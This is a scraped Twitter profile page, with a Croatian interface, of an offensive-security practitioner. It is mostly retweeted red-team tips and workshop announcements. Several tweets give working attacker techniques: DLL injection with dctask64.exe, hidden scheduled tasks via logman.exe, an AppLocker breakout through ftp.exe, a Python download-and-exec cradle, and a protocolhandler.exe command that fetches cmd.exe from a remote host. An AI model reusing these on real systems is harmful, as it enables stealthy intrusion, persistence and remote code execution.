Yash Bharadwaj

@flopyash

Team member Offensive Operations :)

Bhopal, India
Vrijeme pridruživanja: veljača 2018.

Tweetovi

Blokirali ste korisnika/cu @flopyash

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @flopyash

  1. proslijedio/la je Tweet
    4. velj

    Adding a Backdoor to AD in 400 Milliseconds

    Poništi
  2. proslijedio/la je Tweet
    3. velj
    Poništi
  3. 1. velj

    boostmeup

    Poništi
  4. proslijedio/la je Tweet
    31. sij

    Wrote a post on how to use GadgetToJScript with Covenant & Donut Thanks to for the answering my queries and helping me while exploring tool 🙏

    Poništi
  5. proslijedio/la je Tweet
    30. sij
    Poništi
  6. proslijedio/la je Tweet
    30. sij

    Learn how to develop and flash the code with Arduino to Microcontroller to get BLE (Bluetooth Low Energy) signals and exploit them : A hands-on workshop by Veerababu Register at:

    Poništi
  7. 29. sij

    Will be delivering a hands-on workshop at along with !!! Register guys, rock it.

    Poništi
  8. proslijedio/la je Tweet
    28. sij

    For today "side lolbin" let's say thanks to: ZOHO Corporation private Limited with their dctask64.exe. Keep injecting all the dll we want with: dctask64.exe injectDll <dllpath> <PID> bonus point: we have the outputs!!! cc

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    28. sij

    tip: use logman.exe with -b, -rf, -s, and -rc to create highly-privileged local, and remote scheduled tasks. They are deeply hidden in the Task Scheduler GUI, especially as the actions are masked under "Custom Handler". And no one looks for attackers in Perfmon/DCS.

    Poništi
  10. proslijedio/la je Tweet
    26. sij

    Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    27. sij

    Windows Kernel _IMAGE_DOS_HEADER::e_lfanew Denial Of Service/Memory Corruption

    Poništi
  12. proslijedio/la je Tweet
    27. sij

    If 's DotnetToJScript is blocked on newer versions of Windows or if it gets flagged by AMSI, you can use Excel automation via a COM object as an alternative to execute shellcode from JScript or VBScript w/o touching disk. PoC for x86 & x64 here:

    Poništi
  13. proslijedio/la je Tweet
    24. sij

    Here's a cool trick to break out of AppLocker in Citrix environment: 1. Open a dummy RTF file in wordpad 2. Add ftp.exe as an object 3. Click to open ftp (or other similar apps) 4. ftp>!{commmand/app to run} for example: ftp>!cmd <-- blocked? ftp>!powershell <-- not blocked?:)

    Poništi
  14. proslijedio/la je Tweet
    23. sij

    New article! Anti-virus Exploitation: Malwarebytes 4.0.4 - Protection Not Found - Hijacking Malwarebytes via COM IPC

    Poništi
  15. proslijedio/la je Tweet
    24. sij

    Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("");exec(())' Let me know if anyone has a better way to do it, but this seems to work.

    Poništi
  16. proslijedio/la je Tweet
    24. sij

    how to be a bad ctor ctor.dll, LaunchSetup <filename>

    Poništi
  17. proslijedio/la je Tweet
    24. sij

    I am Exploit.. Developer....Zindagi meri hacking....

    Poništi
  18. proslijedio/la je Tweet
    24. sij
    Poništi
  19. proslijedio/la je Tweet
    24. sij

    download via Binary .exe C:\[office installed folder]\root\[version]\ protocolhandler.exe "http://192.168.1.111/cmd.exe" cc

    Poništi
  20. proslijedio/la je Tweet
    24. sij

    is free of cost Event. Its aim is to provide the "Professional training" to the people who are or want to be, working into the Infosec domain for Free of cost.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·